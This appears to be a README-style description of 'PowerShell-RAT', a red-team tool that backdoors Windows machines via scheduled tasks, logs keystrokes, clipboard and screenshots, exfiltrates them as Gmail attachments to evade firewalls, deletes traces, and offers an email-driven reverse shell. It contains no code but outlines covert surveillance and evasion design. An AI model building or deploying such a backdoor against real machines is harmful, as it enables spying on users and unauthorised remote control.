PowerShell-RAT is a stealthy tool which exfiltrates sensitive information from the fully patched Windows environment via screenshots, keystrokes, clipboard hijack and reverse shell over Gmail domain. This tool is highly useful when the standard RAT tools get picked by the client anti-virus software and one need to provide a proof of concept to the client to prove that malicious users or an attacker can exfiltrate information from the network even though they are running fully patched and up-to-date antivirus solutions.
The exfiltrated information is sent to a malicious user over a HTTPS protocol in the form of email attachments. The RAT can be invoked with a single key press using 'Hail Mary' option. Gmail is used to receive files from the backdoored machine as it is considered one of the highly trusted domains, this would allow an attacker to avoid network detection by NextGen Firewalls.
During a Red Team engagement or an Internal Penetration Test, this tool can be executed on any Windows machine which will backdoor the compromised user machine using a number of task schedulers in turn will run the PowerShell modules (scripts). Once backdoored, malicious user receives screenshots, clipboard history and keystrokes of the user activities via email every few minutes. After the email is received, screenshots and log files are deleted from the machine to clean up the disk space, hence, avoiding the detection.
On successful authentication on a Windows machine by a compromised user, backdoor triggers the keystroke module on the user machine. It saves every key press on the keyboard in the "log.txt" file on the user machine and sends it to the malicious user every hour as an email attachment. Similar to keystorkes, user clipboard us monitored every 2 seconds and is saved in the “clip.txt” file and the clipboard information is sent via email every 5 hours.
To setup this RAT it requires a dedicated throw away Gmail account with modification to PowerShell script credential variables and a malicious user needs to enable "Allow less secure apps" under the security settings of the Gmail account to receive screenshots, clipboard and key logs from the backdoored machine. To run these modules user does not require an administrator rights and these options for exfiltration can be customised as per user needs.
Reverse Shell module allows user to execute windows command on the compromised host by sending commands to the throwaway Gmail account. Commands are read in the background by constantly monitoring the inbox for a new email. Commands in the body of an email is read every 5 seconds and is executed instantly. Once the commands are executed on the backdoored host it will send the command output as an email to the attacker Gmail address automatically allowing two way communication between attacker and a compromised host.
Target system can be identified using email subject line which is a compromised host computer name followed by the timestamp. Remote Access Trojan (RAT) Python file can be converted into an executable using Pyinstaller. During demo at BlackHat, I walked everyone through a number of defence mechanisms to detect PowerShell-RAT backdoor using publicly available tools such as Sysinternals from Microsoft. However, all these defensive mechanism solutions can be bypassed by an attacker.
Further details can be obtained from the GitHub: https://github.com/Viralmaniar/Powershell-RAT